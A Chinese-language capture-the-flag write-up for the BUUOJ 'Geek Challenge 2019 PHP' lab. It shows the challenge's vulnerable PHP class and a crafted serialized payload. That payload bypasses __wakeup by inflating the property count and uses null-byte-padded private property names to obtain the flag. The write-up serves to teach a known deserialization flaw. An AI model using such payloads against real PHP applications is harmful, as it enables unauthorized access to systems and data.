buuoj 极客大挑战2019PHP

php反序列化
根据提示有备份，脚本跑一下，备份文件为www.zip。下载后三个php文件，主要代码在class.php中。代码如下：

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}

index.php中有一个反序列化函数，所以大致思路就是通过反序列化来执行__destruct()中的echo $flag。两个条件$this->password == 100，$this->username === 'admin'。在下面加上代码：

$a = new Name('admin',100);
$b=serialize($a);
echo $b;

得到序列化后的字符串O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
修改为O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}其中将2修改为3是为了绕过__wakeup()函数，使username不被覆盖，加上%00是因为username和password都是私有变量，变量中的类名前后会有空白符，而复制的时候会丢失。得到payload后提交即可得到flag。